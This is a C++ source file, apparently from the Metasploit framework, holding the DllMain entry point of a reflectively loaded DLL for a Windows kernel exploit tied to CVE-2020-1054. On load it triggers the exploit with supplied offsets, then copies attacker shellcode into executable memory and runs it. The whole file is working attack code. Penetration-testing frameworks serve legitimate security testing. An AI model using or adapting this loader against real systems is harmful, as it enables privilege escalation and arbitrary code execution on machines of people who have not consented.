external/source/exploits/CVE-2020-1054/dllmain.cpp
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "ReflectiveLoader.c"
#include <stdio.h>
#include <windows.h>
int exploit(unsigned int xleft_offset, unsigned int oob_offset);
typedef struct _MSF_PAYLOAD {
DWORD dwxLeftOffset;
DWORD dwOOBOffset;
DWORD dwSize;
CHAR cPayloadData[0x1000];
} MSF_PAYLOAD;
typedef MSF_PAYLOAD* PMSF_PAYLOAD;
int executepayload(void * payload, size_t size)
{
LPVOID shellcode = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!shellcode) {
return -1;
}
memcpy(shellcode, payload, size);
((void(*)()) shellcode)();
return 0;
}
int runpayload(PMSF_PAYLOAD pMsfPayload)
{
if (!pMsfPayload) {
return -1;
}
return executepayload(&pMsfPayload->cPayloadData, pMsfPayload->dwSize);
}
void beginexploit(LPVOID lpReserved)
{
PMSF_PAYLOAD payload = (PMSF_PAYLOAD)lpReserved;
if (!exploit(payload->dwxLeftOffset, payload->dwOOBOffset))
{
runpayload(payload);
}
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
switch (dwReason)
{
case DLL_METASPLOIT_ATTACH:
break;
case DLL_QUERY_HMODULE:
hAppInstance = hinstDLL;
if (lpReserved != NULL)
{
*(HMODULE*)lpReserved = hAppInstance;
}
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
beginexploit(lpReserved);
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}